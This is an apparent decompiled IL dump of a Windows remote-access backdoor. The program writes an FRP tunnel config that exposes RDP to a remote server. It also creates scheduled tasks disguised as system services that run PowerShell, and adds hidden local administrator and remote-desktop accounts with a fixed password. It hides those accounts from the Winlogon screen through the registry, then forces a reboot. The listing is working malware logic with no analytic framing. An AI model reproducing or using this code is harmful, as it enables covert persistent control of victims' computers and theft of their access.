StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_30 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0591: leave.s IL_05A9 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.2 <null> stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldloc.s V_30 ldloc.s V_31 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error setting up FRP: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_062F: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_33 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_33 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_06AF: nop stloc.s V_34 ldstr Error setting up autorun and task: {0} ldloc.s V_34 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_06AF: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_06AF: nop ldstr System detected, ensuring tasks exist... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_35 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_35 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_06AF: nop stloc.s V_36 ldstr Error ensuring tasks exist: {0} ldloc.s V_36 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06AF: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_37 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_06D0: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_37 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_075B: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_075B: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> 
StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br.s IL_0742: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_42 ldloc.s V_42 stloc.s V_43 ldloc.s V_42 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_44 ldloc.s V_44 ldc.i4.0 <null> blt.s IL_0725: ldloc.s V_43 ldloc.s V_44 ldc.i4.1 <null> add <null> ldloc.s V_42 callvirt System.Int32 System.String::get_Length() bge.s IL_0725: ldloc.s V_43 ldloc.s V_42 ldloc.s V_44 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_43 ldloc.s V_43 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_06EE: ldloca.s V_41 leave.s IL_075B: ldc.i4.0 ldloca.s V_41 constrained. 
System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_38 ldstr SysMaintenance stloc.s V_39 ldloc.s V_37 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_45 ldstr Attempting to configure user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_45 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_46 ldloc.s V_46 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_46 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_39 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0806: leave.s IL_0814 ldstr Skipping user ldloc.s V_45 ldstr due to description containing ldloc.s V_39 call System.String 
System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_09D5: ldloca.s V_41 leave.s IL_0814: ldstr "net" ldloc.s V_46 brfalse.s IL_0813: endfinally ldloc.s V_46 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_45 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_47 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_48 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_49 ldloc.s V_47 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_48 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_49 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_08C0: ldloc.s V_47 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_38 leave IL_09E1: leave.s IL_09F1 ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_08CE: leave.s IL_08DC leave IL_09D5: ldloca.s V_41 leave.s IL_08DC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 brfalse.s IL_08DB: endfinally ldloc.s V_47 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_093D: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_45 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_50 ldloc.s V_50 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_093D: ldstr "gpupdate" ldloc.s V_50 brfalse.s IL_093C: endfinally ldloc.s V_50 callvirt System.Void 
System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_51 ldloc.s V_51 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_51 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09A6: ldc.i4.1 ldloc.s V_51 brfalse.s IL_09A5: endfinally ldloc.s V_51 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Configured user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09E1: leave.s IL_09F1 stloc.s V_52 ldstr Error configuring candidate {0}: {1} ldloc.s V_45 ldloc.s V_52 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue 
IL_0773: ldloca.s V_41 leave.s IL_09F1: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_40 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_39 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_53 ldstr powershell ldstr -Command " ldloc.s V_53 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_54 ldloc.s V_54 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_54 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0A56: leave.s IL_0A64 ldc.i4.1 <null> stloc.s V_40 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A64: leave.s IL_0A7C ldloc.s V_54 brfalse.s IL_0A63: endfinally ldloc.s V_54 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0A7C: ldloc.s V_38 stloc.s V_55 ldstr Error checking for existing maintenance user: {0} ldloc.s V_55 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A7C: ldloc.s V_38 ldloc.s V_38 brtrue IL_0CDB: leave.s IL_0CF3 ldloc.s V_40 brtrue IL_0CDB: leave.s IL_0CF3 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_56 ldc.i4.0 <null> stloc.s V_57 br IL_0CC1: ldloc.s V_57 ldloc.s V_56 ldloc.s V_57 ldelem.ref <null> stloc.s V_58 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_58 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_39 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 
<null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_59 ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_59 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0C96: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0BAA: ldstr "powershell" ldloc.s V_60 brfalse.s IL_0BA9: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell 
ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C03: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_61 brfalse.s IL_0C02: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_62 ldloc.s V_62 ldloc.s V_58 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0C32: ldstr "gpupdate" ldloc.s V_62 brfalse.s IL_0C31: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> 
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_63 ldloc.s V_63 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C7F: ldc.i4.1 ldloc.s V_63 brfalse.s IL_0C7E: endfinally ldloc.s V_63 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Created and configured new user: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CCC: ldloc.s V_38 ldstr Failed to create user ldloc.s V_58 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CBB: ldloc.s V_57 ldloc.s V_59 brfalse.s IL_0CBA: endfinally ldloc.s V_59 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_57 ldc.i4.1 <null> add <null> stloc.s V_57 ldloc.s V_57 ldloc.s V_56 ldlen <null> conv.i4 <null> blt IL_0ABD: ldloc.s V_56 ldloc.s V_38 brtrue.s IL_0CDB: leave.s IL_0CF3 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_64 ldstr Error configuring user(s): {0} ldloc.s V_64 call System.String 
System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0D8A: leave.s IL_0D96 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D72: leave.s IL_0D96 ldloc.s V_65 brfalse.s IL_0D71: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0D96: ret stloc.s V_66 ldstr Error initiating reboot: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D96: ret leave.s IL_0D96: ret ldloc.0 <null> brfalse.s IL_0D95: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |